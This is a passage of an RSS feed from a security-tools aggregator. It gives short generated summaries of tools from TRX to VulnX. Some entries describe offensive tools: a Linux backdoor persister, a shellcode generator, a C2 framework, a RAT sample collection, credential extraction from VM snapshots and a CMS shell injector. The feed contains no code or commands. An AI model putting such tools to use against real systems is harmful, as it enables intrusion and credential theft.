&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; TRX is an open-source reimplementation of the classic Tomb Raider games (I, II, and III), designed to enhance gameplay through decompilation and integration of open-source components. The engine supports distinct mechanics for all three titles and features enhancements such as customizable draw distances, a developer console, updated UI elements, and the capability to run custom levels. Notably, TRX is cross-platform, supporting Windows, Linux, and macOS, with extensive controller compatibility and customizable control options.&lt;/p&gt;</description></item><item><title>TryHackMe-Roadmap</title><link>https://rainmana.github.io/hackyfeed/tools/rng70-tryhackme-roadmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rng70-tryhackme-roadmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The TryHackMe Road Map repository provides a comprehensive list of over 350 free TryHackMe rooms categorized by various cybersecurity topics to facilitate learning and practice in ethical hacking. Its primary use case is to help individuals, from beginners to advanced users, streamline their training by accessing a structured pathway through challenges in areas such as Linux fundamentals, web security, and more. Notable features include the organization of topics for a sequential learning approach and the inclusion of various practical scenarios to enhance hands-on experience in cybersecurity.&lt;/p&gt;</description></item><item><title>twitter-advanced-search</title><link>https://rainmana.github.io/hackyfeed/tools/igorbrigadir-twitter-advanced-search/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/igorbrigadir-twitter-advanced-search/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Twitter Advanced Search tool enhances tweet discovery by leveraging various search operators that allow users to refine their queries based on content, hashtags, emojis, and more. Its primary use case is enabling users to perform intricate searches on Twitter&amp;rsquo;s web, mobile, and TweetDeck platforms, although it is not compatible with certain Twitter API versions. Notable features include support for boolean operators, wildcard searches, and the ability to exclude terms or phrases, significantly expanding the capabilities of standard Twitter search functionalities.&lt;/p&gt;</description></item><item><title>uDork</title><link>https://rainmana.github.io/hackyfeed/tools/m3n0sd0n4ld-udork/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m3n0sd0n4ld-udork/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; uDork is a Bash script designed for Google hacking, leveraging advanced search techniques to uncover sensitive information and detect web application versions without conducting direct attacks. The tool utilizes predefined dorks sourced from the Google Hacking Database, allowing users to find sensitive files, IoT devices, and security vulnerabilities efficiently. Notable features include speed improvements between requests and Docker support for easy deployment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="udork---google-hacking-tool"&gt;uDork - Google Hacking Tool&lt;/h1&gt;
&lt;h6 id="author-m3n0sd0n4ld"&gt;Author: M3n0sD0n4ld&lt;/h6&gt;
&lt;h6 id="twitter-david_"&gt;Twitter: &lt;a href="https://twitter.com/David_Uton"&gt;@David_Uton&lt;/a&gt;&lt;/h6&gt;
&lt;h2 id="news"&gt;News&lt;/h2&gt;
&lt;h3 id="11062022"&gt;11/06/2022&lt;/h3&gt;
&lt;p&gt;I have some bad news to give, last week Facebook withdrew the service by which the tool made the requests, unfortunately the tool no longer works.&lt;/p&gt;</description></item><item><title>Ukraine-Cyber-Operations</title><link>https://rainmana.github.io/hackyfeed/tools/curated-intel-ukraine-cyber-operations/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/curated-intel-ukraine-cyber-operations/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ukraine Cyber Operations repository provides curated threat intelligence resources specifically tailored for organizations in Ukraine, focusing on the ongoing cyber operations related to the Russia-Ukraine conflict. Notable features include a comprehensive timeline of monthly threat reports from 2022 and 2023, contextualized indicators of compromise (IOCs) contributed by the Equinix Threat Analysis Center, and vetted open-source intelligence (OSINT) sources, enhancing the situational awareness and response capabilities of users.&lt;/p&gt;</description></item><item><title>Ultimate-RAT-Collection</title><link>https://rainmana.github.io/hackyfeed/tools/cryakl-ultimate-rat-collection/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cryakl-ultimate-rat-collection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ultimate RAT Collection functions as a repository of Remote Access Trojan (RAT) samples and builders, primarily used for cybersecurity research, analysis, and reverse engineering. It emphasizes caution by advising users to conduct their analysis within secure environments like virtual machines or sandboxes to prevent contamination of critical systems. Notable features include a collection of genuine malware samples and a community-driven approach to include new samples through pull requests.&lt;/p&gt;</description></item><item><title>unipacker</title><link>https://rainmana.github.io/hackyfeed/tools/unipacker-unipacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/unipacker-unipacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Un{i}packer is a platform-independent tool designed for the automatic unpacking of Windows Portable Executable (PE) files that have been packed using various runtime packers, thereby facilitating malware analysis. Utilizing the Unicorn Engine for emulation, it effectively handles multiple well-known packers, including ASPack and UPX, and allows for manual input of addresses for less common packers. This tool is particularly beneficial for analysts seeking to bypass challenges posed by malware obfuscation and streamline the unpacking process without requiring a Windows environment.&lt;/p&gt;</description></item><item><title>unlicense</title><link>https://rainmana.github.io/hackyfeed/tools/ergrelet-unlicense/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ergrelet-unlicense/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Unlicense is a Python 3 tool designed to dynamically unpack executables protected by Themida and WinLicense versions 2.x and 3.x, accommodating both 32-bit and 64-bit portable executables (PEs) and .NET assemblies. Its notable features include automatic recovery of the original entry point (OEP) and obfuscated import tables, although it requires a valid license file for certain WinLicense-protected executables and may produce non-runnable dumps. Users can interact with the tool via a command-line interface or a drag-and-drop executable option for ease of use.&lt;/p&gt;</description></item><item><title>urlfinder</title><link>https://rainmana.github.io/hackyfeed/tools/projectdiscovery-urlfinder/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/projectdiscovery-urlfinder/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; URLFinder is a high-speed, passive URL discovery tool optimized for efficient web asset discovery without active scanning, making it particularly useful for penetration testers and security researchers. It features curated passive sources for comprehensive URL gathering, supports multiple output formats, and provides integration capabilities through STDIN/OUT support.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;URLFinder&lt;/h1&gt;
&lt;p align="center"&gt;
A high-speed tool for passively gathering URLs, optimized for efficient web asset discovery without active scanning.
&lt;/p&gt;
&lt;p align="center"&gt;
&lt;a href="https://opensource.org/licenses/MIT"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-red.svg"&gt;&lt;/a&gt;
&lt;a href="https://goreportcard.com/badge/github.com/projectdiscovery/urlfinder"&gt;&lt;img src="https://goreportcard.com/badge/github.com/projectdiscovery/urlfinder"&gt;&lt;/a&gt;
&lt;a href="https://pkg.go.dev/github.com/projectdiscovery/urlfinder/pkg/urlfinder"&gt;&lt;img src="https://img.shields.io/badge/go-reference-blue"&gt;&lt;/a&gt;
&lt;a href="https://github.com/projectdiscovery/urlfinder/releases"&gt;&lt;img src="https://img.shields.io/github/release/projectdiscovery/urlfinder"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/pdiscoveryio"&gt;&lt;img src="https://img.shields.io/twitter/follow/pdiscoveryio.svg?logo=twitter"&gt;&lt;/a&gt;
&lt;a href="https://discord.gg/projectdiscovery"&gt;&lt;img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;a href="#features"&gt;Features&lt;/a&gt; •
 &lt;a href="#installation"&gt;Installation&lt;/a&gt; •
 &lt;a href="#usage"&gt;Usage&lt;/a&gt; •
 &lt;a href="#examples"&gt;Examples&lt;/a&gt; •
 &lt;a href="https://discord.gg/projectdiscovery"&gt;Join Discord&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>urlhunter</title><link>https://rainmana.github.io/hackyfeed/tools/utkusen-urlhunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/utkusen-urlhunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; urlhunter is a reconnaissance tool designed for searching URLs exposed via URL shortener services like bit.ly and goo.gl. It utilizes collections published by the URLTeam, enabling users to perform keyword and regex searches on historical data with customizable date ranges and output options. Notable features include the ability to specify single or multiple keywords, regex searches, and support for bulk archive downloading, making it ideal for cyber intelligence and bug bounty applications.&lt;/p&gt;</description></item><item><title>Uscrapper</title><link>https://rainmana.github.io/hackyfeed/tools/z0m31en7-uscrapper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/z0m31en7-uscrapper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Uscrapper Vanta is an open-source intelligence tool designed for advanced data extraction from both the surface web and the dark web, specifically targeting personal information such as email addresses, social media links, and geolocations. Notable features include keyword-based scraping for tailored data extraction, support for .onion domains, and comprehensive reporting capabilities, which transform raw data into actionable insights. The tool employs multithreading and anti-web scraping defenses to enhance its effectiveness in information gathering.&lt;/p&gt;</description></item><item><title>user-scanner</title><link>https://rainmana.github.io/hackyfeed/tools/kaifcodec-user-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kaifcodec-user-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; User Scanner is an advanced email and username OSINT tool designed to verify the registration status of emails and the availability of usernames across multiple platforms, including GitHub, X (formerly Twitter), Reddit, and Instagram. It features dual-mode usage for email and username scanning, supports bulk scanning, utilizes wildcard-based username permutations, and provides clear output formats such as JSON and CSV, along with proxy support for enhanced anonymity. The tool&amp;rsquo;s modular architecture allows for easy integration of new platforms, making it a versatile choice for security professionals and branding efforts.&lt;/p&gt;</description></item><item><title>UserFinder</title><link>https://rainmana.github.io/hackyfeed/tools/mishakorzik-userfinder/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mishakorzik-userfinder/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; UserFinder is a shell-based tool designed for identifying users across various social media platforms and gathering additional information. It enables users to perform queries and compile data efficiently, featuring an easy installation process and a straightforward command-line interface. Notable features include a user-friendly script execution with minimal setup requirements and a focus on social profiling capabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img width="99.9%" src="https://raw.githubusercontent.com/mishakorzik/UserFinder/main/IMG_20210816_222842.jpg"/&gt;
&lt;p align="center"&gt;
&lt;a href="mailto:developer.mishakorzhik@gmail.com"&gt;&lt;img title="Report bug" src="https://img.shields.io/badge/email-developer.mishakorzhik%40gmail.com-green?style=for-the-badge&amp;logo=gmail"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik/UserFinder"&gt;&lt;img title="Version" src="https://img.shields.io/badge/Version-1.0.0-green?style=for-the-badge&amp;logo="&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik/UserFinder/blob/main/LICENSE"&gt;&lt;img title="License" src="https://img.shields.io/badge/License-GNU-yellow?style=for-the-badge&amp;logo=gnu"&gt;&lt;/a&gt;
&lt;a href=""&gt;&lt;img title="Python" src="https://img.shields.io/badge/Used-Shell-yellow?style=for-the-badge&amp;logo=shell"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik"&gt;&lt;img title="Report" src="https://img.shields.io/badge/Copyring-2021-orange?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik"&gt;&lt;img title="Autor" src="https://img.shields.io/badge/Author-mishakorzik-orange?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
• &lt;a href="https://github.com/mishakorzik/UserFinder/blob/main/LICENSE"&gt;License&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/UserFinder/issues"&gt;Issues&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik"&gt;Developer&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/UserFinder/wiki"&gt;Wikipedia&lt;/a&gt; •
&lt;p&gt;&lt;strong&gt;Find user in social and more informations!&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>username-anarchy</title><link>https://rainmana.github.io/hackyfeed/tools/urbanadventurer-username-anarchy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/urbanadventurer-username-anarchy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Username Anarchy is a command-line tool designed for generating potential usernames during penetration testing, crucial for user account/password brute force attacks and username enumeration. It features a flexible plugin architecture for various username formats, utilizes common first and last names databases from external sources, and allows for name substitutions to maximize coverage when only partial user information is known. This tool supports input from multiple formats and automates name generation based on country datasets or popular social media aliases.&lt;/p&gt;</description></item><item><title>v3-periphery</title><link>https://rainmana.github.io/hackyfeed/tools/uniswap-v3-periphery/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/uniswap-v3-periphery/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Uniswap V3 Periphery is a collection of smart contracts designed to facilitate interactions with the Uniswap V3 Protocol, providing essential functionalities such as token swaps and liquidity operations. Its primary use case involves integrating these periphery functions into decentralized applications, enabling developers to leverage the protocol&amp;rsquo;s capabilities. Notable features include the ability to import Solidity interfaces for seamless contract interactions and comprehensive local deployment options for testing against mainnet bytecode.&lt;/p&gt;</description></item><item><title>V3n0M-Scanner</title><link>https://rainmana.github.io/hackyfeed/tools/v3n0m-scanner-v3n0m-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/v3n0m-scanner-v3n0m-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; V3n0M-Scanner is an offensive security framework designed for vulnerability scanning and penetration testing, offering a Python-based toolkit that operates across both Linux and Windows platforms. Notable features include advanced scanning capabilities for SQL injection, local file inclusion to remote code execution, and a Cloudflare resolver, along with extensive target lists and efficient scanning of potentially millions of IPs for known vulnerabilities. The tool is open-source and aims to provide transparency and ease of use for security professionals.&lt;/p&gt;</description></item><item><title>VAC</title><link>https://rainmana.github.io/hackyfeed/tools/danielkrupinski-vac/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/danielkrupinski-vac/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VAC is a user-mode anti-cheat system developed by Valve, designed to operate non-invasively on Windows systems. The tool utilizes a set of modules to gather critical system information, enumerate processes, and monitor game performance, primarily focusing on maintaining the integrity of online gaming environments. Notable features include the use of various encryption and hashing methods, such as MD5 and CRC32, to secure operations and information within its modules.&lt;/p&gt;</description></item><item><title>Validity90</title><link>https://rainmana.github.io/hackyfeed/tools/nmikhailov-validity90/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nmikhailov-validity90/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Validity90 is a tool focused on reverse engineering the communication protocol of various Validity fingerprint readers, such as models 138a:0090 and 138a:0094. It aims to create an open-source driver for integration with the libfprint library, featuring a Wireshark dissector for analyzing encrypted communication and a standalone prototype for testing device functionalities. Notably, the project is actively developing specifications and protocols for multiple devices, with partial implementation already achieving scan and internal database check capabilities.&lt;/p&gt;</description></item><item><title>VAmPI</title><link>https://rainmana.github.io/hackyfeed/tools/erev0s-vampi/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/erev0s-vampi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VAmPI is a vulnerable API built on Flask that includes the OWASP Top 10 vulnerabilities for APIs, designed to assess the efficacy of security tools in detecting API-related security issues. It features a global toggle to enable or disable vulnerabilities during testing, along with token-based authentication and a Swagger UI for direct interaction. The tool serves both educational and practical purposes, allowing users to practice security testing and improve their understanding of API vulnerabilities.&lt;/p&gt;</description></item><item><title>Vegile</title><link>https://rainmana.github.io/hackyfeed/tools/screetsec-vegile/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/screetsec-vegile/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Vegile is a post-exploitation tool designed for maintaining stealthy backdoor/rootkit access on Linux systems. Its primary use case involves establishing persistent access to compromised hosts while enabling features such as process hiding and session unlimited capabilities in Metasploit. Notable functionalities include the ability to automatically restart hidden processes, ensuring persistent access even after termination, and support for various backdoor implementations, including those created with msfvenom.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="vegile---ghost-in-the-shell"&gt;Vegile - Ghost In The Shell&lt;/h1&gt;
&lt;p&gt;&lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Vegile-Beta-brightgreen.svg?maxAge=259200" alt="Version"&gt;&lt;/a&gt;
&lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Release-Stable-brightgreen.svg" alt="Stage"&gt;&lt;/a&gt;
&lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Supported_OS-Linux-orange.svg" alt="Build"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>venom</title><link>https://rainmana.github.io/hackyfeed/tools/r00t-3xp10it-venom/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r00t-3xp10it-venom/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VENOM is a metasploit shellcode generator and compiler that enables users to create and inject shellcode payloads in various formats such as C#, Python, Ruby, and executable formats like ELF and APK. Its primary use case lies in Red Team operations, where it assists in payload delivery through a web server and leverages automation to handle dependencies and remote connections seamlessly. Notable features include support for multiple scripting languages, integration with compilers for building executables, and functionalities similar to other popular evasion tools.&lt;/p&gt;</description></item><item><title>Venom</title><link>https://rainmana.github.io/hackyfeed/tools/dliv3-venom/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dliv3-venom/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Venom is a multi-hop proxy tool designed for penetration testers, built using Go, which allows the connection of multiple nodes to facilitate multi-layer traffic routing. Key features include a visual network topology, multi-level SOCKS5 proxying, interactive shell access, and secure communication between nodes, making it ideal for managing complex internal networks during security assessments. The tool supports various platforms and architectures, enhancing its versatility for engagements in diverse environments.&lt;/p&gt;</description></item><item><title>VHostScan</title><link>https://rainmana.github.io/hackyfeed/tools/codingo-vhostscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/codingo-vhostscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VHostScan is a virtual host scanner designed to enhance the discovery of virtual hosts and identify catch-all scenarios, aliases, and dynamic default pages. This tool is particularly useful for penetration testers and security professionals, as it features a modernized codebase, improved wordlists for various environments, robust error handling, and performance optimizations. Notable capabilities include support for both HTTP and HTTPS, customizable wordlist inputs, and the ability to identify new targets through reverse lookups.&lt;/p&gt;</description></item><item><title>Villain</title><link>https://rainmana.github.io/hackyfeed/tools/t3l3machus-villain/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/t3l3machus-villain/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Villain is a high-level C2 framework designed for managing multiple reverse TCP and HoaxShell-based shells, allowing users to enhance shell functionality and share features across different instances. Notable features include customizable payload generation, a dynamic pseudo-shell prompt for session management, file upload capabilities, fileless script execution, and a built-in Session Defender to prevent user errors during command input. The tool is primarily aimed at ethical hacking and penetration testing, ensuring users operate within legal boundaries.&lt;/p&gt;</description></item><item><title>Viper</title><link>https://rainmana.github.io/hackyfeed/tools/funnywolf-viper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/funnywolf-viper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VIPER is an advanced red team platform designed for adversary simulation and cybersecurity assessments, providing users with essential tools and functionalities for efficient red teaming operations. Notable features include a user-friendly interface, multi-platform support across Windows, Linux, and macOS, integration of over 100 post-exploitation modules aligned with the MITRE ATT&amp;amp;CK framework, and a built-in LLM agent for enhanced automation and intelligent decision-making. The platform also allows for custom module development, ensuring flexibility to meet diverse operational needs.&lt;/p&gt;</description></item><item><title>ViperMonkey</title><link>https://rainmana.github.io/hackyfeed/tools/decalage2-vipermonkey/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/decalage2-vipermonkey/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ViperMonkey is a Python-based VBA emulation engine specifically designed for the analysis and deobfuscation of malicious VBA macros found in Microsoft Office files. Its primary use case is aiding cybersecurity professionals in identifying and understanding obfuscated malware by executing VBA scripts in a controlled environment. Notable features include its integration with Docker for ease of installation and enhanced performance when utilizing PyPy, although it also operates with traditional Python interpreters.&lt;/p&gt;</description></item><item><title>vivisect</title><link>https://rainmana.github.io/hackyfeed/tools/vivisect-vivisect/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vivisect-vivisect/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Vivisect is a versatile framework that integrates disassembly, static analysis, symbolic execution, and debugging capabilities, designed for use in cybersecurity tasks. Its primary use case is to facilitate in-depth analysis of binary executables, assisting researchers and security professionals in vulnerability discovery and exploitation analysis. Notable features include Python 3 compatibility, a graphical user interface, and seamless integration with documentation for enhanced usability.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="vivisect--vdb--vtrace"&gt;Vivisect / Vdb / Vtrace&lt;/h1&gt;
&lt;p&gt;A combined disassembler/static analysis/symbolic execution/debugger framework.&lt;/p&gt;</description></item><item><title>VMkatz</title><link>https://rainmana.github.io/hackyfeed/tools/nikaiw-vmkatz/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nikaiw-vmkatz/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VMkatz is a cybersecurity tool designed to extract Windows credentials and secrets directly from virtual machine memory snapshots and disk images without the need for full exfiltration. It supports various input formats, including VMware snapshots and VirtualBox saved states, allowing efficient retrieval of sensitive data such as NTLM hashes, DPAPI master keys, and Kerberos tickets directly from the hypervisor or NAS. Notably, VMkatz operates as a single static binary, requiring minimal setup and enabling rapid credential access in red team engagements.&lt;/p&gt;</description></item><item><title>vmlinux-to-elf</title><link>https://rainmana.github.io/hackyfeed/tools/marin-m-vmlinux-to-elf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/marin-m-vmlinux-to-elf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; vmlinux-to-elf is a tool designed to convert vmlinux, vmlinuz, bzImage, or zImage kernel images into fully analyzable ELF files, recovering function and variable symbols from compressed kernel symbol tables. Its primary use case is embedded systems reverse engineering, enabling users to analyze the resulting ELF files with tools such as IDA Pro and Ghidra. Notable features include automatic detection and unpacking of the main compression formats used in Linux kernels, as well as a graphical user interface for enhanced usability.&lt;/p&gt;</description></item><item><title>vps-audit</title><link>https://rainmana.github.io/hackyfeed/tools/vernu-vps-audit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vernu-vps-audit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The VPS Security Audit Script is a comprehensive Bash tool designed for auditing the security and performance of Debian/Ubuntu-based virtual private servers. It performs extensive security checks, including SSH configuration, firewall status, and system update status, while also monitoring resource usage such as disk space and CPU. The script not only provides real-time color-coded feedback during execution but also generates a detailed report with improvement recommendations based on the audit findings.&lt;/p&gt;</description></item><item><title>vulhunt</title><link>https://rainmana.github.io/hackyfeed/tools/vulhunt-re-vulhunt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vulhunt-re-vulhunt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VulHunt is a vulnerability hunting framework aimed at assisting security researchers in identifying vulnerabilities within software binaries and UEFI firmware. Built on Binarly&amp;rsquo;s BIAS, it supports large-scale vulnerability management and integrates community-developed rulepacks while offering scanning capabilities for various binary formats, including BA2 and Binary Ninja databases. Additionally, it features an MCP server for integration with AI assistants, facilitating real-time vulnerability analysis and reporting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="vulhunt-community-edition"&gt;VulHunt Community Edition&lt;/h1&gt;
&lt;p&gt;VulHunt is a vulnerability hunting framework developed by Binarly&amp;rsquo;s Research
team. It is designed to help security researchers and practitioners identify
vulnerabilities in software binaries and UEFI firmware. VulHunt is built on top
of Binarly&amp;rsquo;s Binary Analysis and Inspection System (BIAS), which provides a
powerful and flexible environment for analysing and understanding binaries.
VulHunt integrates with the capabilities of the Binarly Transparency Platform
(BTP) to enable large-scale vulnerability management, hunting, and triage
capabilities.&lt;/p&gt;</description></item><item><title>vulnx</title><link>https://rainmana.github.io/hackyfeed/tools/anouarbensaad-vulnx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/anouarbensaad-vulnx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; VulnX is an intelligent bot designed for automatic shell injection that identifies vulnerabilities across various content management systems (CMS). Key features include multi-threaded vulnerability scanning, target information gathering, subdomain enumeration, and the ability to search for exploits using dorks, which streamline the injection process as opposed to manual methods. The tool supports multiple CMS platforms, enhancing its usability for security assessments and penetration testing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/anouarbensaad/VulnX"&gt;&lt;img src="https://i.ibb.co/ZxxFqxQ/vxv2.png" alt="VulnX"&gt;&lt;/a&gt;
 &lt;br&gt;
 VulnX
 &lt;br&gt;
&lt;/h1&gt;
&lt;h4 align="center"&gt;Vulnx 🕷️ is An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms &lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/anouarbensaad/vulnx/releases"&gt;
 &lt;img src="https://img.shields.io/github/release/anouarbensaad/vulnx.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://pypi.org/project/vulnx/"&gt;
 &lt;img src="https://img.shields.io/badge/pypi-vulnx-red.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/anouarbensaad/vulnx/issues?q=is%3Aissue+is%3Aclosed"&gt;
 &lt;img src="https://img.shields.io/github/issues-closed/anouarbensaad/vulnx.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://travis-ci.com/anouarbensaad/vulnx"&gt;
 &lt;img src="https://img.shields.io/travis/com/anouarbensaad/vulnx.svg"&gt;
 &lt;/a&gt;
